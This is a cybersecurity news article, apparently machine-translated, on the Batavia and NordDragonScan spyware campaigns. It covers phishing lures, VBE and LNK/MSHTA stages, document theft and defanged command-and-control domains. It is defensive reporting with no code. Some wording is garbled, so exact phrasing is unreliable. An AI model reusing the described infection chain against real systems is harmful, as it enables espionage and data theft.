The Russian organization is being targeted as part of an ongoing campaign to provide previously undocumented Windows spyware called Batavia.
Activities for each cybersecurity vendor Kaspersky have been active since July 2024.
“Targeted attacks start with bait emails containing malicious links sent under the pretext of signing a contract,” the Russian company said. “The main goal of the attack is to infect your organization with previously unknown Batavia spyware, which steals internal documents.”
Email messages are sent from the domain[.]com, “This is said to be owned by the attacker himself. Links embedded in digital miscibles lead to downloading archive files containing Visual Basic Encoded Script (.Vbe) files.
When executed, the script profiles the compromised host and removes system information to the remote server. This is followed by the retrieval of the next stage of payload from the same server, an executable file written in Delphi.
Malware can display fake contracts to victims as a distraction, collecting system logs, office documents (*.doc, *.docx, *.ods, *.odt, *.pdf, *.xls, and *.xlsx), and screenshots in the background. Data collection is also extended to removable devices connected to the host.
Another feature of Delphi malware is to download its own binary from the server. This targets a broader set of file extensions for subsequent collections. This includes images, emails, Microsoft PowerPoint presentations, archive files, and text documents (*.jpeg, *.jpg, *.cdr, *.csv, *.eml, *.ppt, *.pptx, *.odp, *.rar, *.zip, *.rtf, and *.txt).
The newly collected data will be sent to another domain (“ru-exchange[.]com) from where unknown executables are downloaded as the fourth stage to further continue the attack chain.
Kaspersky’s telemetry data shows that over 100 users from dozens of organizations have received phishing emails over the past year.
“As a result of the attack, Batavia will rule out information such as victim documents and listings of installed programs, drivers and operating system components,” the company said.
This disclosure is because Fortinet Fortiguard Labs details a malicious campaign that provides Windows Stealer malware, codenamed Norddragonscan. The exact initial access vector is not clear, but it is considered to be a phishing email that propagates the link that triggers the download of the RAR archive.
“When Norddragonscan is installed, it examines the host, copies the documents, harvests the entire chrome and Firefox profile and takes screenshots,” says security researcher Cara Lin.
Residing in the archive is a Windows Shortcut (LNK) file that uses “MSHTA.EXE” to run a remotely hosted HTML application (HTA). This step searches for benign decoy documents, but the evil .NET payload is silently dropped onto the system.
norddragonscan establishes a connection with a remote server, as it is called steeler malware (“kpuszkievi[.]com”) sets persistence via changes to the Windows registry, conducts extensive reconnaissance of compromised machines, collects sensitive data and returns information to the server via HTTP POST requests.
“The RAR file contains an LNK call that calls MSHTA.EXE to run a malicious HTA script, which displays decoy documents in Ukrainian. Norddragonscan can scan hosts, capture screenshots, extract documents and PDFs, and sniff profiles in Chrome and Firefox.”
Source link
